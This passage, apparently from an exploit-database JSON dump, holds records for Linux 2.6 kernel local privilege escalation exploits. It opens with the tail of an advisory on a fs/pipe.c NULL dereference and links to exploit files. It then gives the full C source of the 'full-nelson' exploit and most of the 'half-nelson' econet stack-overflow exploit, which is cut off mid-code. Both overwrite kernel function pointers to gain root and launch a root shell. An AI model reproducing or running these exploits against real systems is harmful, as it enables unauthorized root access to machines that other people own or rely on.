2.6.0 up to 2.6.10 and \r\nkernels 2.6.11 up to 2.6.31: in the first one the null ptr deref leads \r\nto an arbitrary write to everywhere in the kernel since you have control \r\nover the destination address of \r\n\r\nlinux2.6.9/fs/pipe.c \r\n\r\n... \r\n219 if (pipe_iov_copy_from_user(pipebuf, iov, chars)) { \r\n... \r\nIn such case, we try to exploit this by overwriting and old and obsolete \r\nsyscall address in the sys_call_table by our privilege escalator function \r\naddress (hehe old school trickz are always the best). \r\n\r\nIn kernels 2.6.11 up to 2.6.31, exploitation simply resume in mapping the correct \r\nstruct pipe_inode_info at NULL and the kernel will call a fptr under our control \r\nat inode->i_pipe->bufs[1-16].ops->something() \r\n\r\nYou can find exploits at \r\nhttp://www.vxhell.org/~teach/exploits/ImpelDown.c \r\nand \r\nhttp://www.vxhell.org/~teach/exploits/ImpelDown-2.6.31only.c \r\nThe first one wasn't tested but the second would work for the given kernel \r\n(according to your mmap_min_addr) \r\n\r\nWe highly recommand to apply grsecurity patch ([1]) since UDEREF will preserve \r\nyou from all this bug class, \r\nor at least have a kernel which correctly implement mmap_min_addr, but \r\nJulien and Tavis [2] have already showed you how this can be easily bypassed. \r\nRegards \r\n\r\n[1] http://grsecurity.net \r\n[2] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html \r\n\r\n\r\nteach[at]blackpearl$ head -n 18 exploits/ImpelDown-2.6.31only.c \r\n/****************************************************************************** \r\n* .:: Impel Down ::. \r\n* \r\n* Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86) \r\n* by teach & xipe \r\n* Greetz goes to all our mates from #nibbles, #oldschool and \r\n#carib0u \r\n* (hehe guyz, we would probably be high profile and mediatised el8 \r\nif we \r\n* lost less time on trolling all day long, but we LOVE IT :))) \r\n* Special thanks to Ivanlef0u, j0rn & pouik for being such amazing \r\n(but i \r\n* promise ivan, one day i'll kill u :p) \r\n* \r\n* (C) COPYRIGHT teach & xipe, 2009 \r\n* All Rights Reserved \r\n* \r\n* teach[at]vxhell.org \r\n* xipe[at]vxhell.org \r\n* \r\n\r\n*******************************************************************************/ \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12593", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.37 (RedHat Ubuntu 10.04) - Full-Nelson.c Local Privilege Escalation", "cvss3": {}, "published": "2010-12-07T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.37 (RedHat Ubuntu 10.04) - Full-Nelson.c Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3850", "CVE-2010-4258", "CVE-2010-3849"], "modified": "2010-12-07T00:00:00", "id": "EXPLOITPACK:06473E7FD71F4692F26EB2761FD044F3", "href": "", "sourceData": "/*\n * Linux Kernel <= 2.6.37 local privilege escalation\n * by Dan Rosenberg\n * @djrbliss on twitter\n *\n * Usage:\n * gcc full-nelson.c -o full-nelson\n * ./full-nelson\n *\n * This exploit leverages three vulnerabilities to get root, all of which were\n * discovered by Nelson Elhage:\n *\n * CVE-2010-4258\n * -------------\n * This is the interesting one, and the reason I wrote this exploit. If a\n * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL\n * word will be written to a user-specified pointer when that thread exits.\n * This write is done using put_user(), which ensures the provided destination\n * resides in valid userspace by invoking access_ok(). However, Nelson\n * discovered that when the kernel performs an address limit override via\n * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,\n * etc.), this override is not reverted before calling put_user() in the exit\n * path, allowing a user to write a NULL word to an arbitrary kernel address.\n * Note that this issue requires an additional vulnerability to trigger.\n *\n * CVE-2010-3849\n * -------------\n * This is a NULL pointer dereference in the Econet protocol. By itself, it's\n * fairly benign as a local denial-of-service. It's a perfect candidate to\n * trigger the above issue, since it's reachable via sock_no_sendpage(), which\n * subsequently calls sendmsg under KERNEL_DS.\n *\n * CVE-2010-3850\n * -------------\n * I wouldn't be able to reach the NULL pointer dereference and trigger the\n * OOPS if users weren't able to assign Econet addresses to arbitrary\n * interfaces due to a missing capabilities check.\n *\n * In the interest of public safety, this exploit was specifically designed to\n * be limited:\n *\n * * The particular symbols I resolve are not exported on Slackware or Debian\n * * Red Hat does not support Econet by default\n * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and\n * Debian\n *\n * However, the important issue, CVE-2010-4258, affects everyone, and it would\n * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly\n * more sophisticated version of this that doesn't have the roadblocks I put in\n * to prevent abuse by script kiddies.\n *\n * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.\n *\n * NOTE: the exploit process will deadlock and stay in a zombie state after you\n * exit your root shell because the Econet thread OOPSes while holding the\n * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.\n *\n * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla\n */\n\n// EDB-Note: You may need to add '#define _GNU_SOURCE' to compile in later versions \n\n#include <stdio.h>\n#include <sys/socket.h>\n#include <fcntl.h>\n#include <sys/ioctl.h>\n#include <string.h>\n#include <net/if.h>\n#include <sched.h>\n#include <stdlib.h>\n#include <signal.h>\n#include <sys/utsname.h>\n#include <sys/mman.h>\n#include <unistd.h>\n\n/* How many bytes should we clear in our\n * function pointer to put it into userspace? */\n#ifdef __x86_64__\n#define SHIFT 24\n#define OFFSET 3\n#else\n#define SHIFT 8\n#define OFFSET 1\n#endif\n\n/* thanks spender... */\nunsigned long get_kernel_sym(char *name)\n{\n FILE *f;\n unsigned long addr;\n char dummy;\n char sname[512];\n struct utsname ver;\n int ret;\n int rep = 0;\n int oldstyle = 0;\n\n f = fopen(\"/proc/kallsyms\", \"r\");\n if (f == NULL) {\n f = fopen(\"/proc/ksyms\", \"r\");\n if (f == NULL)\n goto fallback;\n oldstyle = 1;\n }\n\nrepeat:\n ret = 0;\n while(ret != EOF) {\n if (!oldstyle)\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n else {\n ret = fscanf(f, \"%p %s\\n\", (void **)&addr, sname);\n if (ret == 2) {\n char *p;\n if (strstr(sname, \"_O/\") || strstr(sname, \"_S.\"))\n continue;\n p = strrchr(sname, '_');\n if (p > ((char *)sname + 5) && !strncmp(p - 3, \"smp\", 3)) {\n p = p - 4;\n while (p > (char *)sname && *(p - 1) == '_')\n p--;\n *p = '\\0';\n }\n }\n }\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fprintf(stdout, \" [+] Resolved %s to %p%s\\n\", name, (void *)addr, rep ? \" (via System.map)\" : \n\"\");\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n if (rep)\n return 0;\nfallback:\n uname(&ver);\n if (strncmp(ver.release, \"2.6\", 3))\n oldstyle = 1;\n sprintf(sname, \"/boot/System.map-%s\", ver.release);\n f = fopen(sname, \"r\");\n if (f == NULL)\n return 0;\n rep = 1;\n goto repeat;\n}\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\nstatic int __attribute__((regparm(3)))\ngetroot(void * file, void * vma)\n{\n\n commit_creds(prepare_kernel_cred(0));\n return -1;\n\n}\n\n/* Why do I do this? Because on x86-64, the address of\n * commit_creds and prepare_kernel_cred are loaded relative\n * to rip, which means I can't just copy the above payload\n * into my landing area. */\nvoid __attribute__((regparm(3)))\ntrampoline()\n{\n\n#ifdef __x86_64__\n asm(\"mov $getroot, %rax; call *%rax;\");\n#else\n asm(\"mov $getroot, %eax; call *%eax;\");\n#endif\n\n}\n\n/* Triggers a NULL pointer dereference in econet_sendmsg\n * via sock_no_sendpage, so it's under KERNEL_DS */\nint trigger(int * fildes)\n{\n int ret;\n struct ifreq ifr;\n\n memset(&ifr, 0, sizeof(ifr));\n strncpy(ifr.ifr_name, \"eth0\", IFNAMSIZ);\n\n ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);\n\n if(ret < 0) {\n printf(\"[*] Failed to set Econet address.\\n\");\n return -1;\n }\n\n splice(fildes[3], NULL, fildes[1], NULL, 128, 0);\n splice(fildes[0], NULL, fildes[2], NULL, 128, 0);\n\n /* Shouldn't get here... */\n exit(0);\n}\n\nint main(int argc, char * argv[])\n{\n unsigned long econet_ops, econet_ioctl, target, landing;\n int fildes[4], pid;\n void * newstack, * payload;\n\n /* Create file descriptors now so there are two\n references to them after cloning...otherwise\n the child will never return because it\n deadlocks when trying to unlock various\n mutexes after OOPSing */\n pipe(fildes);\n fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);\n fildes[3] = open(\"/dev/zero\", O_RDONLY);\n\n if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {\n printf(\"[*] Failed to open file descriptors.\\n\");\n return -1;\n }\n\n /* Resolve addresses of relevant symbols */\n printf(\"[*] Resolving kernel addresses...\\n\");\n econet_ioctl = get_kernel_sym(\"econet_ioctl\");\n econet_ops = get_kernel_sym(\"econet_ops\");\n commit_creds = (_commit_creds) get_kernel_sym(\"commit_creds\");\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym(\"prepare_kernel_cred\");\n\n if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {\n printf(\"[*] Failed to resolve kernel symbols.\\n\");\n return -1;\n }\n\n if(!(newstack = malloc(65536))) {\n printf(\"[*] Failed to allocate memory.\\n\");\n return -1;\n }\n\n printf(\"[*] Calculating target...\\n\");\n target = econet_ops + 10 * sizeof(void *) - OFFSET;\n\n /* Clear the higher bits */\n landing = econet_ioctl << SHIFT >> SHIFT;\n\n payload = mmap((void *)(landing & ~0xfff), 2 * 4096,\n PROT_READ | PROT_WRITE | PROT_EXEC,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\n\n if ((long)payload == -1) {\n printf(\"[*] Failed to mmap() at target address.\\n\");\n return -1;\n }\n\n memcpy((void *)landing, &trampoline, 1024);\n\n clone((int (*)(void *))trigger,\n (void *)((unsigned long)newstack + 65536),\n CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,\n &fildes, NULL, NULL, target);\n\n sleep(1);\n\n printf(\"[*] Triggering payload...\\n\");\n ioctl(fildes[2], 0, NULL);\n\n if(getuid()) {\n printf(\"[*] Exploit failed to get root.\\n\");\n return -1;\n }\n\n printf(\"[*] Got root!\\n\");\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n}", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 2.6.36.2 (Ubuntu 10.04) - Half-Nelson.c Econet Privilege Escalation", "cvss3": {}, "published": "2011-09-05T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.36.2 (Ubuntu 10.04) - Half-Nelson.c Econet Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4073", "CVE-2010-3850", "CVE-2010-3848"], "modified": "2011-09-05T00:00:00", "id": "EXPLOITPACK:331055013C284D20013F7156B81DB5B6", "href": "", "sourceData": "/*\n * half-nelson.c\n *\n * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848\n *\n * Stack-based buffer overflow in the econet_sendmsg function in \n * net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an \n * econet address is configured, allows local users to gain privileges by \n * providing a large number of iovec structures.\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850\n *\n * The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel \n * before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which \n * allows local users to bypass intended access restrictions and configure \n * econet addresses via an SIOCSIFADDR ioctl call.\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073\n *\n * The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not \n * initialize certain structures, which allows local users to obtain \n * potentially sensitive information from kernel stack memory.\n *\n * Usage:\n *\n * $ gcc half-nelson.c -o half-nelson -lrt\n * $ ./half-nelson\n * [+] looking for symbols...\n * [+] resolved symbol commit_creds to 0xffffffff81088ad0\n * [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0\n * [+] resolved symbol ia32_sysret to 0xffffffff81046692\n * [+] spawning children to achieve adjacent kstacks...\n * [+] found parent kstack at 0xffff88001c6ca000\n * [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000\n * [+] lower child spawning a helper...\n * [+] lower child calling compat_sys_wait4 on helper...\n * [+] helper going to sleep...\n * [+] upper child triggering stack overflow...\n * [+] helper woke up\n * [+] lower child returned from compat_sys_wait4\n * [+] parent's restart_block has been clobbered\n * [+] escalating privileges...\n * [+] launching root shell!\n * # id\n * uid=0(root) gid=0(root)\n *\n * Notes:\n *\n * This exploit leverages three vulnerabilities to escalate privileges. \n * The primary vulnerability is a kernel stack overflow, not a stack buffer \n * overflow as the CVE description incorrectly states. I believe this is the\n * first public exploit for a kernel stack overflow, and it turns out to be \n * a bit tricky due to some particulars of the econet vulnerability. A full \n * breakdown of the exploit is forthcoming.\n *\n * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <stddef.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <limits.h>\n#include <syscall.h>\n#include <inttypes.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/wait.h>\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n#include <sys/ipc.h>\n#include <sys/sem.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n#include <sys/resource.h>\n#include <sys/syscall.h>\n#include <netinet/in.h>\n#include <net/if.h>\n\n#define IOVS 446\n#define NPROC 1024\n#define KSTACK_SIZE 8192\n\n#define KSTACK_UNINIT 0\n#define KSTACK_UPPER 1\n#define KSTACK_LOWER 2\n#define KSTACK_DIE 3\n#define KSTACK_PARENT 4\n#define KSTACK_CLOBBER 5\n\n#define LEAK_BASE 0xffff880000000000\n#define LEAK_TOP 0xffff8800c0000000\n#define LEAK_DEPTH 500\n#define LEAK_OFFSET 32 \n\n#define NR_IPC 0x75\n#define NR_WAIT4 0x72\n#define SEMCTL 0x3\n\n#ifndef PF_ECONET\n#define PF_ECONET 19\n#endif\n\n#define STACK_OFFSET 6\n#define RESTART_OFFSET 40\n\nstruct ec_addr {\n\tunsigned char station;\n\tunsigned char net;\n};\n\nstruct sockaddr_ec {\n\tunsigned short sec_family;\n\tunsigned char port;\n\tunsigned char cb;\n\tunsigned char type;\n\tstruct ec_addr addr;\n\tunsigned long cookie;\n};\n\nstruct ipc64_perm {\n\tuint32_t key;\n\tuint32_t uid;\n\tuint32_t gid;\n\tuint32_t cuid;\n\tuint32_t cgid;\n\tuint32_t mode;\n\tuint16_t seq;\n\tuint16_t __pad2;\n\tunsigned long __unused1;\n\tunsigned long __unused2;\n};\n\nstruct semid64_ds {\n\tstruct ipc64_perm sem_perm;\n\tunsigned long sem_otime;\n\tunsigned long __unused1;\n\tunsigned long sem_ctime;\n\tunsigned long __unused;\n\tunsigned long sem_nsems;\n\tunsigned long __unused3;\n\tunsigned long __unused4;\n};\n\nunion semun {\n\tint val;\n\tstruct semid_ds *buf;\n\tunsigned short *array;\n\tstruct seminfo *__buf;\n};\n\nstruct region {\n\tunsigned long parent;\n\tunsigned long addrs[NPROC];\n};\nstruct region *region;\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\nunsigned long ia32_sysret;\n \nvoid __attribute__((regparm(3)))\nkernel_code(void)\n{\n\tcommit_creds(prepare_kernel_cred(0));\n}\n\nvoid\npayload_parent(void)\n{\n\tasm volatile (\n\t\t\"mov $kernel_code, %rax\\n\"\n\t\t\"call *%rax\\n\"\n\t);\n}\n\nvoid\npayload_child(void)\n{\n\tasm volatile (\n\t\t\"movq $payload_parent, (%0)\\n\"\n\t\t\"jmpq *%1\\n\"\n\t\t:\n\t\t: \"r\"(region->parent + RESTART_OFFSET), \"r\"(ia32_sysret)\n\t);\n}\n\nunsigned long\nget_kstack(void)\n{\n\tint i, size, offset;\n\tunion semun *arg;\n\tstruct semid_ds dummy;\n\tstruct semid64_ds *leaked;\n\tchar *stack_start, *stack_end;\n\tunsigned char *p;\n\tunsigned long kstack, *ptr;\n\n\t/* make sure our argument is 32-bit accessible */\n\targ = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\n\tif (arg == MAP_FAILED) {\n\t\tprintf(\"[-] failure mapping memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\t/* map a fake stack to use during syscall */\n\tstack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\n\tif (stack_start == MAP_FAILED) {\n\t\tprintf(\"[-] failure mapping memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\tstack_end = stack_start + 4096;\n\n\tmemset(arg, 0, sizeof(union semun));\n\tmemset(&dummy, 0, sizeof(struct semid_ds));\n\targ->buf = &dummy;\n\n\t/* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */\n\tasm volatile (\n\t\t\"push %%rax\\n\"\n\t\t\"push %%rbx\\n\"\n\t\t\"push %%rcx\\n\"\n\t\t\"push %%rdx\\n\"\n\t\t\"push %%rsi\\n\"\n\t\t\"push %%rdi\\n\"\n\t\t\"movl %0, %%eax\\n\"\n\t\t\"movl %1, %%ebx\\n\"\n\t\t\"movl %2, %%ecx\\n\"\n\t\t\"movl %3, %%edx\\n\"\n\t\t\"movl %4, %%esi\\n\"\n\t\t\"movq %5, %%rdi\\n\"\n\t\t\"movq %%rsp, %%r8\\n\"\n\t\t\"movq %6, %%rsp\\n\"\n\t\t\"push %%r8\\n\"\n\t\t\"int $0x80\\n\"\n\t\t\"pop %%r8\\n\"\n\t\t\"movq %%r8, %%rsp\\n\"\n\t\t\"pop %%rdi\\n\"\n\t\t\"pop %%rsi\\n\"\n\t\t\"pop %%rdx\\n\"\n\t\t\"pop %%rcx\\n\"\n\t\t\"pop %%rbx\\n\"\n\t\t\"pop %%rax\\n\"\n\t\t:\n\t\t: \"r\"(NR_IPC), \"r\"(SEMCTL), \"r\"(0), \"r\"(0), \"r\"(IPC_SET), \"r\"(arg), \"r\"(stack_end)\n\t\t: \"memory\", \"rax\", \"rbx\", \"rcx\", \"rdx\", \"rsi\", \"rdi\", \"r8\"\n\t);\n\n\t/* naively extract a pointer to the kstack from the kstack */\n\tp = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;\n\tkstack = *(unsigned long *) p;\n\n\tif (kstack < LEAK_BASE || kstack > LEAK_TOP) {\n\t\tprintf(\"[-] failed to leak a suitable kstack address, try again!\\n\");\n\t\texit(1);\n\t}\n\tif ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {\n\t\tprintf(\"[-] failed to leak a suitable kstack address, try again!\\n\");\n\t\texit(1);\n\t}\n\n\tkstack = kstack & ~0x1fff;\n\t\n\treturn kstack;\n}\n\nunsigned long\nget_symbol(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy, sym[512];\n\tint ret = 0;\n \n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (!f) {\n\t\treturn 0;\n\t}\n \n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sym);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sym)) {\n\t\t\tprintf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\tfclose(f);\n \n\treturn 0;\n}\n\nint\nget_adjacent_kstacks(void)\n{\n\tint i, ret, shm, pid, type;\n\n\t/* create shared communication channel between parent and its children */\n\tshm = shm_open(\"/halfnelson\", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);\n\tif (shm < 0) {\n\t\tprintf(\"[-] failed creating shared memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tret = ftruncate(shm, sizeof(struct region));\n\tif (ret != 0) {\n\t\tprintf(\"[-] failed resizing shared memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tregion = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);\n\tmemset(region, KSTACK_UNINIT, sizeof(struct region));\n\n\t/* parent kstack self-discovery */\n\tregion->parent = get_kstack();\n\n\tprintf(\"[+] found parent kstack at 0x%lx\\n\", region->parent);\n\n\t/* fork and discover children with adjacently-allocated kernel stacks */\n\tfor (i = 0; i < NPROC; ++i) {\n\t\tpid = fork();\n\n\t\tif (pid > 0) {\n\t\t\ttype = KSTACK_PARENT;\n\t\t\tcontinue;\n\t\t} else if (pid == 0) {\n\t\t\t/* children do kstack self-discovery */\n\t\t\tregion->addrs[i] = get_kstack();\n\n\t\t\t/* children sleep until parent has found adjacent children */\n\t\t\twhile (1) {\n\t\t\t\tsleep(1);\n\t\t\t\tif (region->addrs[i] == KSTACK_DIE) {\n\t\t\t\t\t/* parent doesn't need us :-( */\n\t\t\t\t\texit(0);\n\t\t\t\t} else if (region->addrs[i] == KSTACK_UPPER) {\n\t\t\t\t\t/* we're the upper adjacent process */\n\t\t\t\t\ttype = KSTACK_UPPER;\n\t\t\t\t\tbreak;\n\t\t\t\t} else if (region->addrs[i] == KSTACK_LOWER) {\n\t\t\t\t\t/* we're the lower adjacent process */\n\t\t\t\t\ttype = KSTACK_LOWER;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\tbreak;\n\t\t} else {\n\t\t\tprintf(\"[-] fork failed, aborting!\\n\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\treturn type;\n}\n\nvoid\ndo_parent(void)\n{\n\tint i, j, upper, lower;\n\n\t/* parent sleeps until we've discovered all the child kstacks */\n\twhile (1) {\n\t\tsleep(1);\n\t\tfor (i = 0; i < NPROC; ++i) {\n\t\t\tif (region->addrs[i] == KSTACK_UNINIT) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (i == NPROC) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* figure out if we have any adjacent child kstacks */\n\tfor (i = 0; i < NPROC; ++i) {\n\t\tfor (j = 0; j < NPROC; ++j) {\n\t\t\tif (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (j != NPROC) {\n\t\t\tbreak;\n\t\t}\n\t}\n\tif (i == NPROC && j == NPROC) {\n\t\tprintf(\"[-] failed to find adjacent kstacks, try again!\\n\");\n\t\texit(1);\n\t}\n\n\tupper = i;\n\tlower = j;\n\n\tprintf(\"[+] found adjacent children kstacks at 0x%lx and 0x%lx\\n\", region->addrs[lower], region->addrs[upper]);\n\n\t/* signal to non-adjacent children to die */\n\tfor (i = 0; i < NPROC; ++i) {\n\t\tif (i != upper && i != lower) {\n\t\t\tregion->addrs[i] = KSTACK_DIE;\n\t\t}\n\t}\n\n\t/* signal adjacent children to continue on */\n\tregion->addrs[upper] = KSTACK_UPPER;\n\tregion->addrs[lower] = KSTACK_LOWER;\n\n\t/* parent sleeps until child has clobbered the fptr */\n\twhile (1) {\n\t\tsleep(1);\n\t\tif (region->parent == KSTACK_CLOBBER) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tprintf(\"[+] escalating privileges...\\n\");\n\n\t/* trigger our clobbered fptr */\n\tsyscall(__NR_restart_syscall);\n\n\t/* our privileges should be escalated now */\n\tif (getuid() != 0) {\n\t\tprintf(\"[-] privilege escalation failed, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] launching root shell!\\n\");\n\n\texecl(\"/bin/sh\", \"/bin/sh\", NULL);\n}\n\nvoid\ndo_child_upper(void)\n{\n\tint i, ret, eco_sock;\n\tstruct sockaddr_ec eco_addr;\n\tstruct msghdr eco_msg;\n\tstruct iovec iovs[IOVS];\n\tstruct ifreq ifr;\n\tchar *target;\n\n\t/* calculate payload target, skip prologue */\n\ttarget = (char *) payload_child;\n\ttarget += 4;\n\t\n\t/* give lower child a chance to enter its wait4 call */\n\tsleep(1);\n\n\t/* write some zeros */\n\tfor (i = 0; i < STACK_OFFSET; ++i) {\n\t\tiovs[i].iov_base = (void *) 0x0;\n\t\tiovs[i].iov_len = 0;\n\t}\n\n\t/* overwrite saved ia32_sysret address on stack */\n\tiovs[STACK_OFFSET].iov_base = (void *) target;\n\tiovs[STACK_OFFSET].iov_len = 0x0246;\n\n\t/* force abort via EFAULT */\n\tfor (i = STACK_OFFSET + 1; i < IOVS; ++i) {\n\t\tiovs[i].iov_base = (void *) 0xffffffff00000000;\n\t\tiovs[i].iov_len = 0;\n\t}\n\n\t/* create econet socket */\n\teco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);\n\tif (eco_sock < 0) {\n\t\tprintf(\"[-] failed creating econet socket, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tmemset(&ifr, 0, sizeof(ifr));\n\tstrcpy(ifr.ifr_name, \"lo\");\n\n\t/* trick econet into associated with the loopback */\n\tret = ioctl(eco_sock, SIOCSIFADDR, &ifr);\n\tif (ret != 0) {\n\t\tprintf(\"[-] failed setting interface address, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tmemset(&eco_addr, 0, sizeof(eco_addr));\n\tmemset(&eco_msg, 0, sizeof(eco_msg));\n\teco_msg.msg_name = &eco_addr;\n\teco_msg.msg_namelen = sizeof(eco_addr);\n\teco_msg.msg_flags = 0;\n\teco_msg.msg_iov = &iovs[0];\n\teco_msg.msg_iovlen = IOVS;\n\n\tprintf(\"[+] upper child triggering stack overflow...\\n\");\n\n\t/* trigger the kstack overflow into lower child's kstack */\n\tret = sendmsg(eco_sock, &eco_msg, 0);\n\tif (ret != -1 || errno != EFAULT) {\n\t\tprintf(\"[-] sendmsg succeeded unexpectedly, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tclose(eco_sock);\n}\n\nvoid\ndo_child_lower(void)\n{\n\tint pid;\n\n\tprintf(\"[+] lower child spawning a helper...\\n\");\n\n\t/* fork off a helper to wait4 on */\n\tpid = fork();\n\tif (pid == 0) {\n\t\tprintf(\"[+] helper going to sleep...\\n\");\n\t\tsleep(5);\n\t\tprintf(\"[+] helper woke up\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] lower child calling compat_sys_wait4 on helper...\\n\");\n\n\t/* syscall(NR_WAIT4, pid, 0, 0, 0) */\n\tasm volatile (\n\t\t\"push %%rax\\n\"\n\t\t\"push %%rbx\\n\"\n\t\t\"push %%rcx\\n\"\n\t\t\"push %%rdx\\n\"\n\t\t\"push %%rsi\\n\"\n\t\t\"movl %0, %%eax\\n\"\n\t\t\"movl %1, %%ebx\\n\"\n\t\t\"movl %2, %%ecx\\n\"\n\t\t\"movl %3, %%edx\\n\"\n\t\t\"movl %4, %%esi\\n\"\n\t\t\"int $0x80\\n\"\n\t\t\"pop %%rsi\\n\"\n\t\t\"pop %%rdx\\n\"\n\t\t\"pop %%rcx\\n\"\n\t\t\"pop %%rbx\\n\"\n\t\t\"pop %%rax\\n\"\n\t\t:\n\t\t: \"r\"(NR_WAIT4), \"r\"(pid), \"r\"(0), \"r\"(0), \"r\"(0)\n\t\t: \"memory\", \"rax\", \"rbx\", \"rcx\", \"rdx\", \"rsi\"\n\t);\n\n\tprintf(\"[+] lower child returned from compat_sys_wait4\\n\");\n\n\tprintf(\"[+] parent's restart_block has been clobbered\\n\");\n\n\t/* signal parent that our fptr should now be clobbered */\n\tregion->parent = KSTACK_CLOBBER;\n}\n\nint\nmain(int argc, char 